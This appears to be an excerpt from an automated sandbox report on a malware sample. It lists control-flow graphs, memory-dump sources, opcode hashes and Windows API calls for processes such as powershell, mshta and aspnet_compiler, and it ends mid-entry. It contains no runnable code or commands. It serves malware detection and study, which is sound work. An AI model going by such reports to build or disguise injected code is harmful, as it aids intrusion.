                                                    control_flow_graph 282 7fe89aa5711-7fe89aa576a 284 7fe89aa5770-7fe89aa577a 282->284 285 7fe89aa58d3-7fe89aa599c 282->285 286 7fe89aa577c-7fe89aa5789 284->286 287 7fe89aa5793-7fe89aa5798 284->287 286->287 288 7fe89aa578b-7fe89aa5791 286->288 289 7fe89aa579e-7fe89aa57a1 287->289 290 7fe89aa5873-7fe89aa587d 287->290 288->287 294 7fe89aa57e6 289->294 295 7fe89aa57a3-7fe89aa57b2 289->295 292 7fe89aa587f-7fe89aa588d 290->292 293 7fe89aa588e-7fe89aa589e 290->293 297 7fe89aa58ab-7fe89aa58d0 293->297 298 7fe89aa58a0-7fe89aa58a4 293->298 299 7fe89aa57e8-7fe89aa57ea 294->299 295->285 307 7fe89aa57b8-7fe89aa57c2 295->307 297->285 298->297 299->290 301 7fe89aa57f0-7fe89aa57f6 299->301 304 7fe89aa57f8-7fe89aa5805 301->304 305 7fe89aa5812-7fe89aa5854 301->305 304->305 310 7fe89aa5807-7fe89aa5810 304->310 318 7fe89aa585a-7fe89aa5872 305->318 308 7fe89aa57db-7fe89aa57e4 307->308 309 7fe89aa57c4-7fe89aa57d1 307->309 308->299 309->308 311 7fe89aa57d3-7fe89aa57d9 309->311 310->305 311->308
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451456788.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe89aa0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 88e1c8d97241f33eb15a932310b58ecd33a3c7bf2daeb69b1527af7ca5248e51
                                                    • Instruction ID: 6507a308b7912adb0f63028b3cdf0a2edb99906a91655161f647d056092672ce
                                                    • Opcode Fuzzy Hash: 88e1c8d97241f33eb15a932310b58ecd33a3c7bf2daeb69b1527af7ca5248e51
                                                    • Instruction Fuzzy Hash: 06415631D1CB8A0FE356E72C58503B97BE2EF86250F1910EBC48DCB1A3DA25AC158391
                                                    Function 000007FE89AA10C9 Relevance: .1, Instructions: 102COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 320 7fe89aa10c9-7fe89aa10dc 321 7fe89aa10ed-7fe89aa1124 320->321 322 7fe89aa10de-7fe89aa10e7 320->322 323 7fe89aa112a-7fe89aa119e 321->323 324 7fe89aa11c1-7fe89aa11cb 321->324 322->321 334 7fe89aa11a6-7fe89aa11be 323->334 325 7fe89aa11d8-7fe89aa11e8 324->325 326 7fe89aa11cd-7fe89aa11d7 324->326 327 7fe89aa11ea-7fe89aa11ee 325->327 328 7fe89aa11f5-7fe89aa121a 325->328 327->328
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451456788.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe89aa0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d06b9de4395418ef46f07e6b301d6829f87b31097fd0318c038170baa75f92ae
                                                    • Instruction ID: 49bebfb337727d795ab6e9bd39aa787d2b37222ff1720193c9c4170a18a61eb8
                                                    • Opcode Fuzzy Hash: d06b9de4395418ef46f07e6b301d6829f87b31097fd0318c038170baa75f92ae
                                                    • Instruction Fuzzy Hash: B0318001A4D7C90FD347937C1964255BFE2DF5724872E10EBC58ECB5A3E5084C6AC366

                                                    Non-executed Functions

                                                    Function 000007FE89AA6FBE Relevance: .6, Instructions: 569COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451456788.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe89aa0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5ae50ad98dda29f640a90777ea69f003a7dd194f1c3ba146df9a566e088565b9
                                                    • Instruction ID: 0c4bec78f8737608718ec8f533a062f022ce71c99dc1f7fd3836c70aa2f88dfe
                                                    • Opcode Fuzzy Hash: 5ae50ad98dda29f640a90777ea69f003a7dd194f1c3ba146df9a566e088565b9
                                                    • Instruction Fuzzy Hash: EAF15A2090EBC90FD747A73898246A63FE1EF97254F1A01EBD48DCB1B3D6189D4AC361
                                                    Function 000007FE89AA34CE Relevance: .3, Instructions: 346COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451456788.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe89aa0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cbe83da96928bc98881e80b5367dda739ddfcbf6563a71eafdcb07f868115681
                                                    • Instruction ID: 2343f320a6c68fc8c17afe8f493fd3fc35df811456d1e38291cabec749204576
                                                    • Opcode Fuzzy Hash: cbe83da96928bc98881e80b5367dda739ddfcbf6563a71eafdcb07f868115681
                                                    • Instruction Fuzzy Hash: 8BB1272080E7CA0FD747A77898242A67FF1EF47254F1A01EBD48DCB1A3D6199D1AC362

                                                    Executed Functions

                                                    Function 03410FC1 Relevance: .0, Instructions: 5COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000003.476592292.0000000003410000.00000010.00000800.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_3_3410000_mshta.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                    • Instruction ID: 3c11ade3c719c212124b216596f3dcb6befe21900d30f5e248621ceefe973db6
                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                    • Instruction Fuzzy Hash:
                                                    Function 03410FB1 Relevance: .0, Instructions: 5COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000003.476592292.0000000003410000.00000010.00000800.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_3_3410000_mshta.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                    • Instruction ID: 3c11ade3c719c212124b216596f3dcb6befe21900d30f5e248621ceefe973db6
                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                    • Instruction Fuzzy Hash:
                                                    Function 03410FB9 Relevance: .0, Instructions: 5COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000003.476592292.0000000003410000.00000010.00000800.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_3_3410000_mshta.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                    • Instruction ID: 3c11ade3c719c212124b216596f3dcb6befe21900d30f5e248621ceefe973db6
                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                    • Instruction Fuzzy Hash:

                                                    Execution Graph

                                                    Execution Coverage:1%
                                                    Dynamic/Decrypted Code Coverage:4.3%
                                                    Signature Coverage:7.5%
                                                    Total number of Nodes:93
                                                    Total number of Limit Nodes:8
                                                    execution_graph 77401 424be3 77405 424bfc 77401->77405 77402 424c88 77403 424c47 77409 42e593 77403->77409 77405->77402 77405->77403 77407 424c83 77405->77407 77408 42e593 RtlFreeHeap 77407->77408 77408->77402 77412 42c813 77409->77412 77411 424c53 77413 42c830 77412->77413 77414 42c841 RtlFreeHeap 77413->77414 77414->77411 77415 42f883 77416 42f7f3 77415->77416 77419 42f850 77416->77419 77421 42e673 77416->77421 77418 42f82d 77420 42e593 RtlFreeHeap 77418->77420 77420->77419 77424 42c7c3 77421->77424 77423 42e68e 77423->77418 77425 42c7e0 77424->77425 77426 42c7f1 RtlAllocateHeap 77425->77426 77426->77423 77427 42ba83 77428 42baa0 77427->77428 77431 a6fdc0 LdrInitializeThunk 77428->77431 77429 42bac8 77431->77429 77497 42f753 77498 42f763 77497->77498 77499 42f769 77497->77499 77500 42e673 RtlAllocateHeap 77499->77500 77501 42f78f 77500->77501 77502 424853 77503 42486f 77502->77503 77504 424897 77503->77504 77505 4248ab 77503->77505 77506 42c4a3 NtClose 77504->77506 77507 42c4a3 NtClose 77505->77507 77508 4248a0 77506->77508 77509 4248b4 77507->77509 77512 42e6b3 RtlAllocateHeap 77509->77512 77511 4248bf 77512->77511 77518 413a73 77522 413a93 77518->77522 77520 413afc 77521 413af2 77522->77520 77523 41b263 RtlFreeHeap LdrInitializeThunk 77522->77523 77523->77521 77524 a6f9f0 LdrInitializeThunk 77432 401a0b 77434 4019eb 77432->77434 77433 401a00 77434->77433 77437 42fc23 77434->77437 77440 42e143 77437->77440 77441 42e169 77440->77441 77450 407413 77441->77450 77443 42e17f 77449 401aa8 77443->77449 77453 41af53 77443->77453 77445 42e19e 77446 42c863 ExitProcess 77445->77446 77447 42e1b3 77445->77447 77446->77447 77464 42c863 77447->77464 77452 407420 77450->77452 77467 416293 77450->77467 77452->77443 77454 41af7f 77453->77454 77483 41ae43 77454->77483 77457 41afc4 77461 42c4a3 NtClose 77457->77461 77462 41afe0 77457->77462 77458 41afac 77459 41afb7 77458->77459 77489 42c4a3 77458->77489 77459->77445 77463 41afd6 77461->77463 77462->77445 77463->77445 77465 42c880 77464->77465 77466 42c891 ExitProcess 77465->77466 77466->77449 77468 4162b0 77467->77468 77470 4162c9 77468->77470 77471 42cf13 77468->77471 77470->77452 77473 42cf2d 77471->77473 77472 42cf5c 77472->77470 77473->77472 77478 42bad3 77473->77478 77476 42e593 RtlFreeHeap 77477 42cfd5 77476->77477 77477->77470 77479 42baed 77478->77479 77482 a6fae8 LdrInitializeThunk 77479->77482 77480 42bb19 77480->77476 77482->77480 77484 41af39 77483->77484 77485 41ae5d 77483->77485 77484->77457 77484->77458 77492 42bb73 77485->77492 77488 42c4a3 NtClose 77488->77484 77490 42c4c0 77489->77490 77491 42c4d1 NtClose 77490->77491 77491->77459 77493 42bb90 77492->77493 77496 a707ac LdrInitializeThunk 77493->77496 77494 41af2d 77494->77488 77496->77494

                                                    Executed Functions

                                                    Function 0042C4A3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 26 42c4a3-42c4df call 404773 call 42d703 NtClose
                                                    APIs
                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C4DA
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_400000_aspnet_compiler.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 0281abc325b70bf167454d393558beda0c7014649f4c41559f3eeee4f3c43d81
                                                    • Instruction ID: 33488c65c50e967ce8032212b01be2a4ccc8566337b661b198c809349525c89b
                                                    • Opcode Fuzzy Hash: 0281abc325b70bf167454d393558beda0c7014649f4c41559f3eeee4f3c43d81
                                                    • Instruction Fuzzy Hash: 98E046762002187BD220AA6AEC41F9B776CDFC6724F44441AFA08A7281CBB4BA0186B5
                                                    Function 00A707AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 40 a707ac-a707c1 LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                    Function 00A6F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 36 a6f9f0-a6fa05 LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                    Function 00A6FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 37 a6fae8-a6fafd LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                    Function 00A6FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 38 a6fb68-a6fb7d LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                    Function 00A6FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 39 a6fdc0-a6fdd5 LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                    Function 0042C813 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 42c813-42c857 call 404773 call 42d703 RtlFreeHeap
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C852
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_400000_aspnet_compiler.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: 'cA
                                                    • API String ID: 3298025750-2370355221
                                                    • Opcode ID: bec87bca31af92aec9494093564906b61a46ba24f88768d571c812d6104144da
                                                    • Instruction ID: 17d5cb76b4341d50fd7aa1bda6014d5d3e310c77e1840313bf8453552cdf047a
                                                    • Opcode Fuzzy Hash: bec87bca31af92aec9494093564906b61a46ba24f88768d571c812d6104144da
                                                    • Instruction Fuzzy Hash: D8E06D712042087BD610EE59DC41F9B33ACEFC9710F404419F908A7241C774B91186B9
                                                    Function 0042C7C3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 21 42c7c3-42c807 call 404773 call 42d703 RtlAllocateHeap
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(?,0041E40E,?,?,00000000,?,0041E40E,?,?,?), ref: 0042C802
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_400000_aspnet_compiler.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 57b2a52395c9222767e05ed8cc01738bdf3033cd1b87f39c2aaa5050d618ec99
                                                    • Instruction ID: d9b28d67632644e52be635d512cdd863fcd8cc5184f4de7700c5ec6c30784a09
                                                    • Opcode Fuzzy Hash: 57b2a52395c9222767e05ed8cc01738bdf3033cd1b87f39c2aaa5050d618ec99
                                                    • Instruction Fuzzy Hash: F4E09275354208BBD610EE59DC41FAB37ACEFC5714F00001AF908A7241D770B91087B9
                                                    Function 0042C863 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 31 42c863-42c89f call 404773 call 42d703 ExitProcess
                                                    APIs
                                                    • ExitProcess.KERNELBASE(?), ref: 0042C89A
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_400000_aspnet_compiler.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: a4d4bde1c41013d22935837f348492cefa208b3edefa264fb9d256cbbf11bae2
                                                    • Instruction ID: f3636df3db5ba9ab49c58778ad6cc278f2ad92603f3ac2d072733826d1314c23
                                                    • Opcode Fuzzy Hash: a4d4bde1c41013d22935837f348492cefa208b3edefa264fb9d256cbbf11bae2
                                                    • Instruction Fuzzy Hash: 17E08C7A200214BBD220FA6AEC42FDBB76DDFC5715F40405AFA08A7281C774BA0087F9

                                                    Non-executed Functions

                                                    Function 00A60080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [Pj
                                                    • API String ID: 0-2289356113
                                                    • Opcode ID: 88b1481c0890d4ccf6b9aee6a733e627154f3a85f6c371679481d25e8bd3cb73
                                                    • Instruction ID: 5a87116bf2fab3d6c10ac10ef8fca5cb297bb17399bdee1fe53db92739af6a7f
                                                    • Opcode Fuzzy Hash: 88b1481c0890d4ccf6b9aee6a733e627154f3a85f6c371679481d25e8bd3cb73
                                                    • Instruction Fuzzy Hash: ABF06D31208244BBEB229B20CD85F2B7BB9EF95754F158858F9456A0D3CB7288A1E721
                                                    Function 00A826F8 Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                    • Instruction ID: bafef5bdfe8207e1bf49f89c5d6fa6a675774b7b7e9eb6f378e839c1bc45c2fd
                                                    • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                    • Instruction Fuzzy Hash: E5F0C271724159DBDB48FB2A9D51B7A73E9EB94300F58C039EE89C7241E631DD408390
                                                    Function 00AC0101 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
